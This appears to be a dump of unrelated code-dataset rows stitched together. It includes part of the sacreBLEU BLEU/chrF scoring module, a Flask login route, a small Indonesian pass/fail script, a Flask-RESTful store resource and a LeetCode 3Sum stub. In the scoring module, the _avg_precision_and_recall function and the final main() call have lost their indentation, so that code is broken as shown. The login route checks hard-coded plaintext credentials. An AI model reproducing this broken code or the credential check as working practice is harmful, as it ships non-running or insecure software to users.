    :param smooth_method: The smoothing method to use
    :param smooth_value: The smoothing value added, if smooth method 'floor' is used
    :param use_effective_order: If true, use the length of `correct` for the n-gram order instead of NGRAM_ORDER.
    :return: A BLEU object with the score (100-based) and other statistics.
    """
    # Fill in the default smoothing value for methods that take one.
    if smooth_method in SMOOTH_VALUE_DEFAULT and smooth_value is None:
        smooth_value = SMOOTH_VALUE_DEFAULT[smooth_method]
    precisions = [0 for x in range(NGRAM_ORDER)]
    smooth_mteval = 1.
    effective_order = NGRAM_ORDER
    for n in range(1, NGRAM_ORDER + 1):
        # add-k smoothing bumps numerator and denominator for orders n > 1.
        if smooth_method == 'add-k' and n > 1:
            correct[n-1] += smooth_value
            total[n-1] += smooth_value
        # No n-grams at this order at all: all higher orders are empty too.
        if total[n-1] == 0:
            break
        if use_effective_order:
            effective_order = n
        if correct[n-1] == 0:
            # Zero matches at this order: apply the chosen smoothing.
            if smooth_method == 'exp':
                # NIST: each successive zero order halves the assumed precision.
                smooth_mteval *= 2
                precisions[n-1] = 100. / (smooth_mteval * total[n-1])
            elif smooth_method == 'floor':
                precisions[n-1] = 100. * smooth_value / total[n-1]
        else:
            precisions[n-1] = 100. * correct[n-1] / total[n-1]
    # If the system guesses no i-grams, 1 <= i <= NGRAM_ORDER, the BLEU score is 0 (technically undefined).
    # This is a problem for sentence-level BLEU or a corpus of short sentences, where systems will get no credit
    # if sentence lengths fall under the NGRAM_ORDER threshold. This fix scales NGRAM_ORDER to the observed
    # maximum order. It is only available through the API and off by default
    brevity_penalty = 1.0
    if sys_len < ref_len:
        # Empty system output gets BP = 0 to avoid dividing by zero.
        brevity_penalty = math.exp(1 - ref_len / sys_len) if sys_len > 0 else 0.0
    # Geometric mean of the (smoothed) precisions, scaled by the brevity penalty.
    score = brevity_penalty * math.exp(sum(map(my_log, precisions[:effective_order])) / effective_order)
    return BLEU(score, correct, total, precisions, brevity_penalty, sys_len, ref_len)
def sentence_bleu(hypothesis: str,
                  references: List[str],
                  smooth_method: str = 'floor',
                  smooth_value: float = None,
                  use_effective_order: bool = True) -> BLEU:
    """
    Computes BLEU on a single sentence pair.

    Disclaimer: computing BLEU on the sentence level is not its intended use,
    BLEU is a corpus-level metric.

    :param hypothesis: Hypothesis string.
    :param references: The references for the hypothesis.
    :param smooth_method: The smoothing method to use (default: 'floor').
    :param smooth_value: For 'floor' smoothing, the floor value to use.
    :param use_effective_order: Account for references that are shorter than the largest n-gram.
    :return: A BLEU object (read the .score attribute for the numeric score).
    """
    # NOTE(review): `references` is forwarded unchanged as corpus_bleu's
    # ref_streams argument, so each element is treated as a reference *stream*.
    # The caller in this file passes a list of single-element lists
    # ([[x] for x in references]); passing plain strings here would make
    # corpus_bleu iterate them character by character — confirm the intended
    # input shape before relying on the List[str] annotation.
    bleu = corpus_bleu(hypothesis, references,
                       smooth_method=smooth_method,
                       smooth_value=smooth_value,
                       use_effective_order=use_effective_order)
    return bleu
def corpus_bleu(sys_stream: Union[str, Iterable[str]],
                ref_streams: Union[str, List[Iterable[str]]],
                smooth_method='exp',
                smooth_value=None,
                force=False,
                lowercase=False,
                tokenize=DEFAULT_TOKENIZER,
                use_effective_order=False) -> BLEU:
    """Produces BLEU scores along with its sufficient statistics from a source against one or more references.

    :param sys_stream: The system stream (a sequence of segments)
    :param ref_streams: A list of one or more reference streams (each a sequence of segments)
    :param smooth_method: The smoothing method to use
    :param smooth_value: For 'floor' smoothing, the floor to use
    :param force: Ignore data that looks already tokenized
    :param lowercase: Lowercase the data
    :param tokenize: The tokenizer to use
    :return: a BLEU object containing everything you'd want
    :raises EOFError: if the system and reference streams differ in length
    """
    # Add some robustness to the input arguments
    # A bare string is promoted to a single-segment stream.
    if isinstance(sys_stream, str):
        sys_stream = [sys_stream]
    if isinstance(ref_streams, str):
        ref_streams = [[ref_streams]]
    sys_len = 0
    ref_len = 0
    # Cumulative clipped-match and total n-gram counts, indexed by n-1.
    correct = [0 for n in range(NGRAM_ORDER)]
    total = [0 for n in range(NGRAM_ORDER)]
    # look for already-tokenized sentences
    tokenized_count = 0
    fhs = [sys_stream] + ref_streams
    for lines in zip_longest(*fhs):
        # zip_longest pads the shorter stream with None, signaling a mismatch.
        if None in lines:
            raise EOFError("Source and reference streams have different lengths!")
        if lowercase:
            lines = [x.lower() for x in lines]
        # Heuristic: detokenized text should not end in " ." — warn once after
        # 100 such lines unless --force was given or tokenization is disabled.
        if not (force or tokenize == 'none') and lines[0].rstrip().endswith(' .'):
            tokenized_count += 1
            if tokenized_count == 100:
                sacrelogger.warning('That\'s 100 lines that end in a tokenized period (\'.\')')
                sacrelogger.warning('It looks like you forgot to detokenize your test data, which may hurt your score.')
                sacrelogger.warning('If you insist your data is detokenized, or don\'t care, you can suppress this message with \'--force\'.')
        output, *refs = [TOKENIZERS[tokenize](x.rstrip()) for x in lines]
        # Merge reference n-gram counts and choose the closest reference length.
        ref_ngrams, closest_diff, closest_len = ref_stats(output, refs)
        sys_len += len(output.split())
        ref_len += closest_len
        sys_ngrams = extract_ngrams(output)
        for ngram in sys_ngrams.keys():
            n = len(ngram.split())
            # Clip each n-gram's credit to its maximum reference count.
            correct[n-1] += min(sys_ngrams[ngram], ref_ngrams.get(ngram, 0))
            total[n-1] += sys_ngrams[ngram]
    return compute_bleu(correct, total, sys_len, ref_len, smooth_method=smooth_method, smooth_value=smooth_value, use_effective_order=use_effective_order)
def raw_corpus_bleu(sys_stream, ref_streams, smooth_value=None) -> BLEU:
    """Convenience wrapper around corpus_bleu() for pre-tokenized input.

    Uses no tokenization and 'floor' smoothing (whose floor defaults to 0,
    i.e. effectively no smoothing) — handy when using sacrebleu as a library,
    say for scoring on dev.

    :param sys_stream: the system stream (a sequence of segments)
    :param ref_streams: a list of one or more reference streams (each a sequence of segments)
    """
    return corpus_bleu(
        sys_stream,
        ref_streams,
        smooth_method='floor',
        smooth_value=smooth_value,
        force=True,
        tokenize='none',
        use_effective_order=True)
def delete_whitespace(text: str) -> str:
    """
    Removes all whitespace characters from *text*.

    The original additionally called .strip() on the result, which is
    redundant: after every whitespace character has been removed there is
    nothing left for strip() to take off.
    """
    return re.sub(r'\s+', '', text)
def get_sentence_statistics(hypothesis: str,
                            reference: str,
                            order: int = CHRF_ORDER,
                            remove_whitespace: bool = True) -> List[float]:
    """Collect per-order chrF statistics for one hypothesis/reference pair.

    For each n in 1..order the returned flat list holds three slots:
    [hypothesis n-gram count, reference n-gram count, matching n-gram count].
    """
    if remove_whitespace:
        hypothesis = delete_whitespace(hypothesis)
        reference = delete_whitespace(reference)
    stats = []
    for n in range(1, order + 1):
        hyp_ngrams = extract_char_ngrams(hypothesis, n)
        ref_ngrams = extract_char_ngrams(reference, n)
        # Counter intersection keeps the minimum count of each shared n-gram.
        overlap = hyp_ngrams & ref_ngrams
        stats.extend([sum(hyp_ngrams.values()),
                      sum(ref_ngrams.values()),
                      sum(overlap.values())])
    return stats
def get_corpus_statistics(hypotheses: Iterable[str],
                          references: Iterable[str],
                          order: int = CHRF_ORDER,
                          remove_whitespace: bool = True) -> List[float]:
    """Sum the sentence-level chrF statistics over a parallel corpus."""
    totals = [0] * (order * 3)
    for hyp, ref in zip(hypotheses, references):
        sent_stats = get_sentence_statistics(hyp, ref, order=order, remove_whitespace=remove_whitespace)
        # Accumulate each of the 3*order slots position-wise.
        for i, value in enumerate(sent_stats):
            totals[i] += value
    return totals
def _avg_precision_and_recall(statistics: List[float], order: int) -> Tuple[float, float]:
avg_precision = 0.0
avg_recall = 0.0
effective_order = 0
for i in range(order):
hypotheses_ngrams = statistics[3 * i + 0]
references_ngrams = statistics[3 * i + 1]
common_ngrams = statistics[3 * i + 2]
if hypotheses_ngrams > 0 and references_ngrams > 0:
avg_precision += common_ngrams / hypotheses_ngrams
avg_recall += common_ngrams / references_ngrams
effective_order += 1
if effective_order == 0:
return 0.0, 0.0
avg_precision /= effective_order
avg_recall /= effective_order
return avg_precision, avg_recall
def _chrf(avg_precision, avg_recall, beta: int = CHRF_BETA) -> float:
    """Combine averaged precision and recall into the chrF F-score.

    `beta` weights recall relative to precision (beta=1 gives equal weight).
    """
    if avg_precision + avg_recall == 0:
        # No overlap at all: avoid a zero denominator below.
        return 0.0
    b2 = beta ** 2
    return (1 + b2) * (avg_precision * avg_recall) / ((b2 * avg_precision) + avg_recall)
def corpus_chrf(hypotheses: Iterable[str],
                references: Iterable[str],
                order: int = CHRF_ORDER,
                beta: float = CHRF_BETA,
                remove_whitespace: bool = True) -> CHRF:
    """
    Computes Chrf on a corpus.

    :param hypotheses: Stream of hypotheses.
    :param references: Stream of references
    :param order: Maximum n-gram order.
    :param remove_whitespace: Whether to delete all whitespace from hypothesis and reference strings.
    :param beta: Defines importance of recall w.r.t precision. If beta=1, same importance.
    :return: Chrf score.
    """
    stats = get_corpus_statistics(hypotheses,
                                  references,
                                  order=order,
                                  remove_whitespace=remove_whitespace)
    precision, recall = _avg_precision_and_recall(stats, order)
    return CHRF(_chrf(precision, recall, beta=beta))
def sentence_chrf(hypothesis: str,
                  reference: str,
                  order: int = CHRF_ORDER,
                  beta: float = CHRF_BETA,
                  remove_whitespace: bool = True) -> CHRF:
    """
    Computes ChrF on a single sentence pair.

    :param hypothesis: Hypothesis string.
    :param reference: Reference string.
    :param order: Maximum n-gram order.
    :param remove_whitespace: Whether to delete whitespaces from hypothesis and reference strings.
    :param beta: Defines importance of recall w.r.t precision. If beta=1, same importance.
    :return: Chrf score.
    """
    stats = get_sentence_statistics(hypothesis,
                                    reference,
                                    order=order,
                                    remove_whitespace=remove_whitespace)
    precision, recall = _avg_precision_and_recall(stats, order)
    return CHRF(_chrf(precision, recall, beta=beta))
def get_langpairs_for_testset(testset: str) -> List:
    """Return the list of language-pair keys (e.g. 'en-de') for a given test set.

    Unknown test sets yield an empty list.
    """
    # Bug fix: the original pattern was the non-raw string '\w\w\-\w\w', whose
    # '\w' and '\-' are invalid string escapes (DeprecationWarning today,
    # an error in future Python). Use a raw string; '-' needs no escaping here.
    return [pair for pair in DATASETS.get(testset, {}).keys()
            if re.match(r'\w\w-\w\w', pair)]
def get_a_list_of_testset_names() -> str:
    """Return a string with a formatted list of available test sets plus their descriptions."""
    lines = ['The available test sets are:']
    # Newest-first: test set names sort reverse-chronologically (wmt19, wmt18, ...).
    for name in sorted(DATASETS, reverse=True):
        lines.append('%20s: %s' % (name, DATASETS[name].get('description', '')))
    return '\n'.join(lines)
def _available_origlangs(test_sets, langpair):
    """Return the sorted origlang values found in the raw SGM files of the given test sets."""
    origlangs = set()
    for test_set in test_sets.split(','):
        rawfile = os.path.join(SACREBLEU_DIR, test_set, 'raw', DATASETS[test_set][langpair][0])
        # Only SGM files carry <doc ... origlang="..."> annotations.
        # NOTE(review): files ending in '.sgml' are not matched here — confirm intended.
        if rawfile.endswith('.sgm'):
            with smart_open(rawfile) as fin:
                for line in fin:
                    if line.startswith('<doc '):
                        origlangs.add(re.sub(r'.* origlang="([^"]+)".*\n', '\\1', line))
    return sorted(origlangs)
def _filter_subset(systems, test_sets, langpair, origlang, subset=None):
    """Filter sentences with a given origlang (or subset) according to the raw SGM files.

    :param systems: list of parallel sentence lists (system output plus references)
    :param test_sets: comma-separated test set names (must match how `systems` was built)
    :param langpair: language pair used to locate each raw SGM file
    :param origlang: keep documents with this original language; "non-" prefix negates
    :param subset: keep documents whose subset annotation matches this regex
    :return: the input lists with non-matching sentences removed
    :raises ValueError: if filtering is requested without a test set and language pair
    """
    # Nothing to filter: hand the streams back untouched.
    if origlang is None and subset is None:
        return systems
    if test_sets is None or langpair is None:
        raise ValueError('Filtering for --origlang or --subset needs a test (-t) and a language pair (-l).')
    # Build a boolean keep/drop mask with one entry per <seg>, spanning all test sets.
    indices_to_keep = []
    for test_set in test_sets.split(','):
        rawfile = os.path.join(SACREBLEU_DIR, test_set, 'raw', DATASETS[test_set][langpair][0])
        if not rawfile.endswith('.sgm'):
            raise Exception('--origlang and --subset supports only *.sgm files, not %s', rawfile)
        if subset is not None:
            if test_set not in SUBSETS:
                raise Exception('No subset annotation available for test set ' + test_set)
            doc_to_tags = SUBSETS[test_set]
        number_sentences_included = 0
        with smart_open(rawfile) as fin:
            include_doc = False
            for line in fin:
                # Each <doc> header decides the fate of all <seg> lines that follow it.
                if line.startswith('<doc '):
                    if origlang is None:
                        include_doc = True
                    else:
                        doc_origlang = re.sub(r'.* origlang="([^"]+)".*\n', '\\1', line)
                        if origlang.startswith('non-'):
                            include_doc = doc_origlang != origlang[4:]
                        else:
                            include_doc = doc_origlang == origlang
                    # The subset filter further restricts documents already accepted above.
                    if subset is not None:
                        doc_id = re.sub(r'.* docid="([^"]+)".*\n', '\\1', line)
                        if not re.search(subset, doc_to_tags.get(doc_id, '')):
                            include_doc = False
                if line.startswith('<seg '):
                    indices_to_keep.append(include_doc)
                    number_sentences_included += 1 if include_doc else 0
    return [[sentence for sentence,keep in zip(sys, indices_to_keep) if keep] for sys in systems]
def main():
    """CLI entry point: parse args, run the requested action, print the score(s)."""
    args = parse_args()

    # Explicitly set the encoding
    sys.stdin = open(sys.stdin.fileno(), mode='r', encoding='utf-8', buffering=True, newline="\n")
    sys.stdout = open(sys.stdout.fileno(), mode='w', encoding='utf-8', buffering=True)

    if not args.quiet:
        logging.basicConfig(level=logging.INFO, format='sacreBLEU: %(message)s')

    # --download: fetch the test set and quit.
    if args.download:
        download_test_set(args.download, args.langpair)
        sys.exit(0)

    # --list: print available test sets (or the language pairs of one) and quit.
    if args.list:
        if args.test_set:
            print(' '.join(get_langpairs_for_testset(args.test_set)))
        else:
            print(get_a_list_of_testset_names())
        sys.exit(0)

    if args.sentence_level and len(args.metrics) > 1:
        sacrelogger.error('Only one metric can be used with Sentence-level reporting.')
        sys.exit(1)

    # --citation: dump the bibtex entries for the chosen test sets and quit.
    if args.citation:
        if not args.test_set:
            sacrelogger.error('I need a test set (-t).')
            sys.exit(1)
        for test_set in args.test_set.split(','):
            if 'citation' not in DATASETS[test_set]:
                sacrelogger.error('No citation found for %s', test_set)
            else:
                print(DATASETS[test_set]['citation'])
        sys.exit(0)

    # --num-refs only makes sense with a single, externally supplied reference file.
    if args.num_refs != 1 and (args.test_set is not None or len(args.refs) > 1):
        sacrelogger.error('The --num-refs argument allows you to provide any number of tab-delimited references in a single file.')
        sacrelogger.error('You can only use it with externaly-provided references, however (i.e., not with `-t`),')
        sacrelogger.error('and you cannot then provide multiple reference files.')
        sys.exit(1)

    if args.test_set is not None:
        for test_set in args.test_set.split(','):
            if test_set not in DATASETS:
                sacrelogger.error('Unknown test set "%s"\n%s', test_set, get_a_list_of_testset_names())
                sys.exit(1)

    # Exactly one of a predefined test set (-t) or explicit reference files is required.
    if args.test_set is None:
        if len(args.refs) == 0:
            sacrelogger.error('I need either a predefined test set (-t) or a list of references')
            sacrelogger.error(get_a_list_of_testset_names())
            sys.exit(1)
    elif len(args.refs) > 0:
        sacrelogger.error('I need exactly one of (a) a predefined test set (-t) or (b) a list of references')
        sys.exit(1)
    elif args.langpair is None:
        sacrelogger.error('I need a language pair (-l).')
        sys.exit(1)
    else:
        for test_set in args.test_set.split(','):
            if args.langpair not in DATASETS[test_set]:
                sacrelogger.error('No such language pair "%s"', args.langpair)
                sacrelogger.error('Available language pairs for test set "%s": %s', test_set,
                                  ', '.join(x for x in DATASETS[test_set].keys() if '-' in x))
                sys.exit(1)

    # --echo: print the requested side(s) of the test set and quit.
    if args.echo:
        if args.langpair is None or args.test_set is None:
            sacrelogger.warning("--echo requires a test set (--t) and a language pair (-l)")
            sys.exit(1)
        for test_set in args.test_set.split(','):
            print_test_set(test_set, args.langpair, args.echo, args.origlang, args.subset)
        sys.exit(0)

    if args.test_set is not None and args.tokenize == 'none':
        sacrelogger.warning("You are turning off sacrebleu's internal tokenization ('--tokenize none'), presumably to supply\n"
                            "your own reference tokenization. Published numbers will not be comparable with other papers.\n")

    # Internal tokenizer settings: default to the language-specific tokenizer
    # for Chinese and Japanese targets, otherwise DEFAULT_TOKENIZER.
    if args.tokenize is None:
        # set default
        if args.langpair is not None and args.langpair.split('-')[1] == 'zh':
            args.tokenize = 'zh'
        elif args.langpair is not None and args.langpair.split('-')[1] == 'ja':
            args.tokenize = 'ja-mecab'
        else:
            args.tokenize = DEFAULT_TOKENIZER

    if args.langpair is not None and 'bleu' in args.metrics:
        # Bug fix: these two warnings previously used an undefined name `logger`,
        # raising NameError at runtime instead of warning; use the module-level
        # `sacrelogger` like everywhere else in this file.
        if args.langpair.split('-')[1] == 'zh' and args.tokenize != 'zh':
            sacrelogger.warning('You should also pass "--tok zh" when scoring Chinese...')
        if args.langpair.split('-')[1] == 'ja' and not args.tokenize.startswith('ja-'):
            sacrelogger.warning('You should also pass "--tok ja-mecab" when scoring Japanese...')

    # concat_ref_files is a list of list of reference filenames, for example:
    # concat_ref_files = [[testset1_refA, testset1_refB], [testset2_refA, testset2_refB]]
    if args.test_set is None:
        concat_ref_files = [args.refs]
    else:
        concat_ref_files = []
        for test_set in args.test_set.split(','):
            _, *ref_files = download_test_set(test_set, args.langpair)
            if len(ref_files) == 0:
                sacrelogger.warning('No references found for test set {}/{}.'.format(test_set, args.langpair))
            concat_ref_files.append(ref_files)

    # Read the system output from --input (default: stdin).
    inputfh = io.TextIOWrapper(sys.stdin.buffer, encoding=args.encoding) if args.input == '-' else smart_open(args.input, encoding=args.encoding)
    full_system = inputfh.readlines()

    # Read references: full_refs[i] collects reference i across all test sets.
    full_refs = [[] for x in range(max(len(concat_ref_files[0]), args.num_refs))]
    for ref_files in concat_ref_files:
        for refno, ref_file in enumerate(ref_files):
            for lineno, line in enumerate(smart_open(ref_file, encoding=args.encoding), 1):
                if args.num_refs != 1:
                    # Tab-delimited multi-reference file: split into exactly num_refs fields.
                    splits = line.rstrip().split(sep='\t', maxsplit=args.num_refs-1)
                    if len(splits) != args.num_refs:
                        sacrelogger.error('FATAL: line {}: expected {} fields, but found {}.'.format(lineno, args.num_refs, len(splits)))
                        sys.exit(17)
                    for refno, split in enumerate(splits):
                        full_refs[refno].append(split)
                else:
                    full_refs[refno].append(line)

    # Filter sentences according to a given origlang
    system, *refs = _filter_subset([full_system, *full_refs], args.test_set, args.langpair, args.origlang, args.subset)

    if len(system) == 0:
        message = 'Test set %s contains no sentence' % args.test_set
        if args.origlang is not None or args.subset is not None:
            message += ' with'
            message += '' if args.origlang is None else ' origlang=' + args.origlang
            message += '' if args.subset is None else ' subset=' + args.subset
        sacrelogger.error(message)
        # Consistency fix: use sys.exit like the rest of this function
        # (bare exit() is injected by the site module and may be absent).
        sys.exit(1)

    # Handle sentence level and quit
    if args.sentence_level:
        for output, *references in zip(system, *refs):
            results = []
            for metric in args.metrics:
                if metric == 'bleu':
                    bleu = sentence_bleu(output,
                                         [[x] for x in references],
                                         smooth_method=args.smooth,
                                         smooth_value=args.smooth_value)
                    results.append(bleu)
                if metric == 'chrf':
                    chrf = sentence_chrf(output,
                                         references[0],
                                         args.chrf_order,
                                         args.chrf_beta,
                                         remove_whitespace=not args.chrf_whitespace)
                    results.append(chrf)
            display_metric(args.metrics, results, len(refs), args)
        sys.exit(0)

    # Else, handle system level
    results = []
    try:
        for metric in args.metrics:
            if metric == 'bleu':
                bleu = corpus_bleu(system, refs, smooth_method=args.smooth, smooth_value=args.smooth_value, force=args.force, lowercase=args.lc, tokenize=args.tokenize)
                results.append(bleu)
            elif metric == 'chrf':
                chrf = corpus_chrf(system, refs[0], beta=args.chrf_beta, order=args.chrf_order, remove_whitespace=not args.chrf_whitespace)
                results.append(chrf)
    except EOFError:
        sacrelogger.error('The input and reference stream(s) were of different lengths.')
        if args.test_set is not None:
            sacrelogger.error('\nThis could be a problem with your system output or with sacreBLEU\'s reference database.\n'
                              'If the latter, you can clean out the references cache by typing:\n'
                              '\n'
                              '    rm -r %s/%s\n'
                              '\n'
                              'They will be downloaded automatically again the next time you run sacreBLEU.', SACREBLEU_DIR,
                              args.test_set)
        sys.exit(1)

    display_metric(args.metrics, results, len(refs), args)

    # --detail: break the score down by original language (and subset, when annotated).
    if args.detail:
        width = args.width
        sents_digits = len(str(len(full_system)))
        origlangs = args.origlang if args.origlang else _available_origlangs(args.test_set, args.langpair)
        for origlang in origlangs:
            subsets = [None]
            if args.subset is not None:
                subsets += [args.subset]
            elif all(t in SUBSETS for t in args.test_set.split(',')):
                subsets += COUNTRIES + DOMAINS
            for subset in subsets:
                system, *refs = _filter_subset([full_system, *full_refs], args.test_set, args.langpair, origlang, subset)
                if len(system) == 0:
                    continue
                if subset in COUNTRIES:
                    subset_str = '%20s' % ('country=' + subset)
                elif subset in DOMAINS:
                    subset_str = '%20s' % ('domain=' + subset)
                else:
                    subset_str = '%20s' % ''
                if 'bleu' in args.metrics:
                    bleu = corpus_bleu(system, refs, smooth_method=args.smooth, smooth_value=args.smooth_value, force=args.force, lowercase=args.lc, tokenize=args.tokenize)
                    print('origlang={} {}: sentences={:{}} BLEU={:{}.{}f}'.format(origlang, subset_str, len(system), sents_digits, bleu.score, width+4, width))
                if 'chrf' in args.metrics:
                    chrf = corpus_chrf(system, refs[0], beta=args.chrf_beta, order=args.chrf_order, remove_whitespace=not args.chrf_whitespace)
                    print('origlang={} {}: sentences={:{}} chrF={:{}.{}f}'.format(origlang, subset_str, len(system), sents_digits, chrf.score, width+4, width))
def display_metric(metrics_to_print, results, num_refs, args):
    """Print one line per computed metric, with its signature unless --score-only.

    Badly in need of refactoring: one idea is to put all of this in the BLEU
    and CHRF classes, and then define a Result::signature() function.
    """
    for metric, result in zip(metrics_to_print, results):
        # Bare numeric score, shared by both metrics when --score-only is given.
        score_str = '{0:.{1}f}'.format(result.score, args.width)
        if metric == 'bleu':
            if args.score_only:
                print(score_str)
            else:
                version_str = bleu_signature(args, num_refs)
                print(result.format(args.width).replace('BLEU', 'BLEU+' + version_str))
        elif metric == 'chrf':
            if args.score_only:
                print(score_str)
            else:
                version_str = chrf_signature(args, num_refs)
                print('chrF{0:d}+{1} = {2:.{3}f}'.format(args.chrf_beta, version_str, result.score, args.width))
def parse_args():
    """Build the argparse parser for the sacreBLEU CLI and parse sys.argv.

    :return: the parsed argument namespace
    """
    arg_parser = argparse.ArgumentParser(
        description='sacreBLEU: Hassle-free computation of shareable BLEU scores.\n'
                    'Quick usage: score your detokenized output against WMT\'14 EN-DE:\n'
                    '    cat output.detok.de | sacrebleu -t wmt14 -l en-de',
        # epilog = 'Available test sets: ' + ','.join(sorted(DATASETS.keys(), reverse=True)),
        formatter_class=argparse.RawDescriptionHelpFormatter)
    # Data selection: which test set / language pair / document subset to score.
    arg_parser.add_argument('--test-set', '-t', type=str, default=None,
                            help='the test set to use (see also --list) or a comma-separated list of test sets to be concatenated')
    arg_parser.add_argument('-lc', action='store_true', default=False,
                            help='Use case-insensitive BLEU (default: actual case)')
    arg_parser.add_argument('--sentence-level', '-sl', action='store_true',
                            help='Output metric on each sentence.')
    # Smoothing options (see compute_bleu for the method definitions).
    arg_parser.add_argument('--smooth', '-s', choices=['exp', 'floor', 'add-k', 'none'],
                            default='exp',
                            help='smoothing method: exponential decay (default), floor (increment zero counts), add-k (increment num/denom by k for n>1), or none')
    arg_parser.add_argument('--smooth-value', '-sv', type=float, default=None,
                            help='The value to pass to the smoothing technique, only used for floor and add-k. Default floor: {}, add-k: {}.'.format(
                                SMOOTH_VALUE_DEFAULT['floor'], SMOOTH_VALUE_DEFAULT['add-k']))
    # Tokenization: None here means "pick a default later based on the language pair".
    arg_parser.add_argument('--tokenize', '-tok', choices=TOKENIZERS.keys(), default=None,
                            help='tokenization method to use')
    arg_parser.add_argument('--language-pair', '-l', dest='langpair', default=None,
                            help='source-target language pair (2-char ISO639-1 codes)')
    arg_parser.add_argument('--origlang', '-ol', dest='origlang', default=None,
                            help='use a subset of sentences with a given original language (2-char ISO639-1 codes), "non-" prefix means negation')
    arg_parser.add_argument('--subset', dest='subset', default=None,
                            help='use a subset of sentences whose document annotation matches a give regex (see SUBSETS in the source code)')
    # Actions that run and exit without scoring.
    arg_parser.add_argument('--download', type=str, default=None,
                            help='download a test set and quit')
    arg_parser.add_argument('--echo', choices=['src', 'ref', 'both'], type=str, default=None,
                            help='output the source (src), reference (ref), or both (both, pasted) to STDOUT and quit')
    # Input sources: system output file/stdin and reference handling.
    arg_parser.add_argument('--input', '-i', type=str, default='-',
                            help='Read input from a file instead of STDIN')
    arg_parser.add_argument('--num-refs', '-nr', type=int, default=1,
                            help='Split the reference stream on tabs, and expect this many references. Default: %(default)s.')
    arg_parser.add_argument('refs', nargs='*', default=[],
                            help='optional list of references (for backwards-compatibility with older scripts)')
    # Metric selection and chrF-specific knobs.
    arg_parser.add_argument('--metrics', '-m', choices=['bleu', 'chrf'], nargs='+',
                            default=['bleu'],
                            help='metrics to compute (default: bleu)')
    arg_parser.add_argument('--chrf-order', type=int, default=CHRF_ORDER,
                            help='chrf character order (default: %(default)s)')
    arg_parser.add_argument('--chrf-beta', type=int, default=CHRF_BETA,
                            help='chrf BETA parameter (default: %(default)s)')
    arg_parser.add_argument('--chrf-whitespace', action='store_true', default=False,
                            help='include whitespace in chrF calculation (default: %(default)s)')
    # Output formatting and miscellaneous flags.
    arg_parser.add_argument('--short', default=False, action='store_true',
                            help='produce a shorter (less human readable) signature')
    arg_parser.add_argument('--score-only', '-b', default=False, action='store_true',
                            help='output only the BLEU score')
    arg_parser.add_argument('--force', default=False, action='store_true',
                            help='insist that your tokenized input is actually detokenized')
    arg_parser.add_argument('--quiet', '-q', default=False, action='store_true',
                            help='suppress informative output')
    arg_parser.add_argument('--encoding', '-e', type=str, default='utf-8',
                            help='open text files with specified encoding (default: %(default)s)')
    arg_parser.add_argument('--list', default=False, action='store_true',
                            help='print a list of all available test sets.')
    arg_parser.add_argument('--citation', '--cite', default=False, action='store_true',
                            help='dump the bibtex citation and quit.')
    arg_parser.add_argument('--width', '-w', type=int, default=1,
                            help='floating point width (default: %(default)s)')
    arg_parser.add_argument('--detail', '-d', default=False, action='store_true',
                            help='print extra information (split test sets based on origlang)')
    arg_parser.add_argument('-V', '--version', action='version',
                            version='%(prog)s {}'.format(VERSION))
    args = arg_parser.parse_args()
    return args
if __name__ == '__main__':
main()
|
9,576 | 763e2db4eb9ad5953273fb310c8e9714964a39e6 | from flask import Blueprint, request, render_template, session, redirect
log = Blueprint('login', __name__, )
@log.route('/login', methods=['GET', 'POST'])
def login():
    """Render the login form on GET; validate credentials on POST.

    NOTE(review): credentials are hard-coded and compared in plain text —
    fine for a demo, not for production.
    """
    print(request.path)
    if request.method != 'GET':
        username = request.form.get('username')
        password = request.form.get('password')
        if username == 'henry' and password == '123':
            session['username'] = 'henry'
            return redirect('/detail')
        return 'Failed'
    return render_template('exec/login.html')
|
9,577 | 759b440bf436afbfb081cf55eeb4a0f075ed3e6d | ulang = 'y'
# Repeatedly read a score and report pass/fail until the user declines.
# Fix: the original loop asked "y/n" but never inspected the answer, so it
# looped forever; now any answer other than 'y' exits.
while True:
    a = int(input("masukkan nilai = "))
    if a > 60:
        status = "LULUS"
    else:  # a <= 60
        status = "TIDAK LULUS"
    print(status)
    ulang = input("apakah anda ingin mengulang? y/n = ")
    if ulang.strip().lower() != 'y':
        break
9,578 | 5616ec135a2233e742ff3b2b1f378ec12298b935 | from flask_restful import Resource, reqparse
import sqlite3
from flask_jwt import jwt_required
from models.item_model import ItemModel
from flask_sqlalchemy import SQLAlchemy
from d import db
from models.store_model import StoreModel
class Modell(Resource):
    """REST resource for a single store, addressed by name.

    Fixes: GET and PUT previously dereferenced ``None`` (AttributeError →
    HTTP 500) when the store did not exist; DELETE reported success even
    when nothing was deleted, and the success message had a typo.
    """

    def get(self, name):
        """Return the store as JSON, or a 404 payload if it is absent."""
        item = StoreModel.find_by_name(name)
        if item:
            return item.json()
        return {"message": "store not found"}, 404

    def post(self, name):
        """Create a new store; refuse if one with this name already exists."""
        if StoreModel.find_by_name(name):
            return {"message": "sorry no store available in this name"}
        item = StoreModel(name)
        item.save_to_db()
        return item.json()

    def put(self, name):
        """Upsert: create the store when missing, then persist it."""
        item = StoreModel.find_by_name(name)
        if item is None:
            item = StoreModel(name)
        item.save_to_db()
        return item.json()

    def delete(self, name):
        """Delete the store if present; report 404 otherwise."""
        item = StoreModel.find_by_name(name)
        if item:
            item.delete_from_db()
            return {"m": "deleted successfully"}
        return {"message": "store not found"}, 404
class Storelist(Resource):
    """REST resource returning every store.

    Fix: the original returned raw model objects, which flask_restful cannot
    JSON-serialize; serialize each via its ``json()`` method (the same
    contract ``Modell`` relies on).
    """

    def get(self):
        return {"item": [store.json() for store in StoreModel.query.all()]}
9,579 | d806d1b31712e3d8d60f4bfbc60c6939dfeeb357 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 16 20:47:28 2019
@author: jaco
"""
|
9,580 | ccf3ada9a2bedf29820170f2e8184fc16f1b7aea | #
# @lc app=leetcode.cn id=15 lang=python3
#
# [15] 三数之和
#
# https://leetcode-cn.com/problems/3sum/description/
#
# algorithms
# Medium (25.76%)
# Likes: 1904
# Dislikes: 0
# Total Accepted: 176.6K
# Total Submissions: 679K
# Testcase Example: '[-1,0,1,2,-1,-4]'
#
# 给你一个包含 n 个整数的数组 nums,判断 nums 中是否存在三个元素 a,b,c ,使得 a + b + c = 0
# ?请你找出所有满足条件且不重复的三元组。
#
# 注意:答案中不可以包含重复的三元组。
#
#
#
# 示例:
#
# 给定数组 nums = [-1, 0, 1, 2, -1, -4],
#
# 满足要求的三元组集合为:
# [
# [-1, 0, 1],
# [-1, -1, 2]
# ]
#
# 1. 三层循环暴力求解
# 2. 双指针求解
# 3. hashmap 求解
# @lc code=start
class Solution:
